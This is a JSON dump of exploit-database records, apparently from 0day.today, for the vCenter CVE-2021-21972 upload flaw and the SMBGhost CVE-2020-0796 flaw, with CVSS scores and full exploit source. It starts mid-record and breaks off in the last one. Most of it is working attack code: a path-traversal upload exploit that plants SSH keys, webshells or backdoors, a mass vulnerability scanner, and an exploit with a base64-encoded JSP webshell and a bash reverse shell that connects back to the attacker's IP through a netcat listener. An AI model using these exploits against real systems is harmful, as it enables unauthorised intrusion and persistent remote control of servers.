end\n\n print_good('Successfully requested JSP payload')\n end\n\n def generate_ova\n ova_file = StringIO.new\n\n # HACK: Spray JSP in the OVA and pray we get a shell...\n Rex::Tar::Writer.new(ova_file) do |tar|\n jsp_paths.each do |path|\n # /tmp/unicorn_ova_dir/../../<path>\n tar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) }\n end\n end\n\n ova_file.string\n end\n\n def jsp_paths\n case target['Platform']\n when 'linux'\n @jsp_paths ||= spray_and_pray_range.shuffle.map do |idx|\n \"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\"\n end\n when 'win'\n # Forward slashes work here\n [\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"]\n end\n end\n\n def ova_filename\n @ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\"\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35912", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T15:55:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "zdt", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "1337DAY-ID-35863", "href": "https://0day.today/exploit/description/35863", "sourceData": "#-*- coding:utf-8 -*-\nbanner = \"\"\"\n 888888ba dP \n 88 `8b 88 \n a88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n 88 `8b. 88' `88 88 Y8ooooo. 88 88 \n 88 .88 88. .88 88 88 88. .88 \n 88888888P `88888P8 dP `88888P' `88888P' \n ooooooooooooooooooooooooooooooooooooooooooooooooooooo \n @time:2021/02/24 CVE-2021-21972.py\n C0de by NebulabdSec - @batsu \n \"\"\"\nprint(banner)\n\nimport threadpool\nimport random\nimport requests\nimport argparse\nimport http.client\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nhttp.client.HTTPConnection._http_vsn = 10\nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'\n\nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\"\n\ndef get_ua():\n first_num = random.randint(55, 62)\n third_num = random.randint(0, 3200)\n fourth_num = random.randint(0, 140)\n os_type = [\n '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',\n '(Macintosh; Intel Mac OS X 10_12_6)'\n ]\n chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)\n\n ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',\n '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']\n )\n return ua\n\ndef CVE_2021_21972(url):\n proxies = {\"scoks5\": \"http://127.0.0.1:1081\"}\n headers = {\n 'User-Agent': get_ua(),\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n targetUrl = url + TARGET_URI\n try:\n res = requests.get(targetUrl,\n headers=headers,\n timeout=15,\n verify=False,\n proxies=proxies)\n # proxies={'socks5': 'http://127.0.0.1:1081'})\n # print(len(res.text))\n if res.status_code == 405:\n print(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url))\n # print(\"[+] Command success result: \" + res.text + \"\\n\")\n with open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw:\n fw.write(url + '\\n')\n else:\n print(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\")\n # except Exception as e:\n # print(e)\n except:\n print(\"[-] \" + url + \" Request ERROR.\\n\")\ndef multithreading(filename, pools=5):\n works = []\n with open(filename, \"r\") as f:\n for i in f:\n func_params = [i.rstrip(\"\\n\")]\n # func_params = [i] + [cmd]\n works.append((func_params, None))\n pool = threadpool.ThreadPool(pools)\n reqs = threadpool.makeRequests(CVE_2021_21972, works)\n [pool.putRequest(req) for req in reqs]\n pool.wait()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\",\n \"--url\",\n help=\"Target URL; Example:http://ip:port\")\n parser.add_argument(\"-f\",\n \"--file\",\n help=\"Url File; Example:url.txt\")\n # parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \")\n args = parser.parse_args()\n url = args.url\n # cmd = args.cmd\n file_path = args.file\n if url != None and file_path ==None:\n CVE_2021_21972(url)\n elif url == None and file_path != None:\n multithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/35863", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T22:25:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "1337DAY-ID-35879", "href": "https://0day.today/exploit/description/35879", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh [email\u00a0protected]' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux vCenter Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? [y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')\n\n# 0day.today [2021-09-10] #", "sourceHref": "https://0day.today/exploit/35879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T13:45:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-25T00:00:00", "type": "zdt", "title": "VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-25T00:00:00", "id": "1337DAY-ID-36472", "href": "https://0day.today/exploit/description/36472", "sourceData": "# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: CHackA0101\n# Vendor Homepage: https://kb.vmware.com/s/article/82374\n# Software Link: https://www.vmware.com/products/vcenter-server.html\n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)\n# CVE: 2021-21972\n\n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md\n\n#!/usr/bin/python2\n\nimport os\nimport urllib3\nimport argparse\nimport sys\nimport requests\nimport base64\nimport tarfile\nimport threading\nimport time\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nmyargs=argparse.ArgumentParser()\nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True)\nmyargs.add_argument('-L','--local',help='Your local IP',required=True)\nargs=myargs.parse_args()\n\ndef getprompt(x):\n\tprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n\ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"):\n fullpath=\"../\" * 7 + path\n return fullpath.replace('\\\\','/').replace('//','/')\n\ndef createbackdoor(localip):\n # shell4.jsp\n backdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\"\n backdoor = base64.b64decode(backdoor).decode('utf-8')\n f = open(\"shell4.jsp\",\"w\")\n f.write(backdoor)\n f.close()\n # reverse.sh \n # After decoding overwrite string 'CUSTOM_IP' for local IP \n shell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\"\n shell=base64.b64decode(shell).decode('utf-8')\n shell=shell.replace('CUSTOM_IP',localip)\n f=open(\"reverse.sh\",\"w\")\n f.write(shell)\n f.close()\n # Move on with the payload\n payload_file=tarfile.open('payload.tar','w')\n myroute=getpath()\n getprompt('Adding web backdoor to archive')\n payload_file.add(\"shell4.jsp\", myroute)\n myroute=getpath(\"tmp/reverse.sh\")\n getprompt('Adding bash backdoor to archive')\n payload_file.add(\"reverse.sh\", myroute)\n payload_file.close()\n # cleaning up a little bit\n os.unlink(\"reverse.sh\")\n os.unlink(\"shell4.jsp\")\n getprompt('Backdoor file just was created.')\n\ndef launchexploit(ip):\n res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)\n if res.status_code == 200 and res.text == 'SUCCESS':\n getprompt('Backdoor was uploaded successfully!')\n return True\n else:\n getprompt('Backdoor failed to be uploaded. Target denied access.')\n return False\n\ndef testshell(ip):\n getprompt('Looking for shell...')\n shell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\"\n res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)\n if res.status_code==200:\n getprompt('Shell was found!.')\n response=res.text\n if True:\n getprompt('Shell is responsive.')\n try:\n response=re.findall(\"b>(.+)</\",response)[0]\n print('$>uname -a')\n print(response)\n except:\n pass\n return True\n else:\n getprompt('Sorry. Shell was not found.')\n return False\n\ndef opendoor(url):\n time.sleep(3)\n getprompt('Executing command.')\n requests.get(url, verify=False, timeout=1800)\n\t\ndef executebackdoor(ip, localip):\n url=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\"\n t=threading.Thread(target=opendoor,args=(url,))\n t.start()\n getprompt('Setting up socket '+localip+':443')\n os.system('nc -lnvp 443')\n\nif len(sys.argv)== 1:\n myargs.print_help(sys.stderr)\n sys.exit(1)\ncreatebackdoor(args.local)\nuploaded=launchexploit(args.target)\nif uploaded:\n tested=testshell(args.target)\n if tested:\n executebackdoor(args.target, args.local)\ngetprompt(\"Execution completed!\")\n", "sourceHref": "https://0day.today/exploit/36472", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T01:30:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-30T00:00:00", "type": "zdt", "title": "Microsoft Windows 10 (1903/1909) - (SMBGhost) SMB3.1.1 Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-30T00:00:00", "id": "1337DAY-ID-34171", "href": "https://0day.today/exploit/description/34171", "sourceData": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation\n\n# CVE-2020-0796\n\nWindows SMBv3 LPE Exploit\n\n\n\n## Authors\n\n * Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](https://twitter.com/danigargu))\n * Manuel Blanco Paraj\u00f3n ([@dialluvioso_](https://twitter.com/dialluvioso_))\n\n## References\n\n* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\n* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html\n* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter\n* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/\n* http://blogs.360.cn/post/CVE-2020-0796.html\n* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/\n\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip\n", "sourceHref": "https://0day.today/exploit/34171", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-23T16:44:38", "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself before injecting a payload into winlogon.exe.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-06T00:00:00", "type": "zdt", "title": "Microsoft Server Message Block 3.1.1 (SMBv3) Compression Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 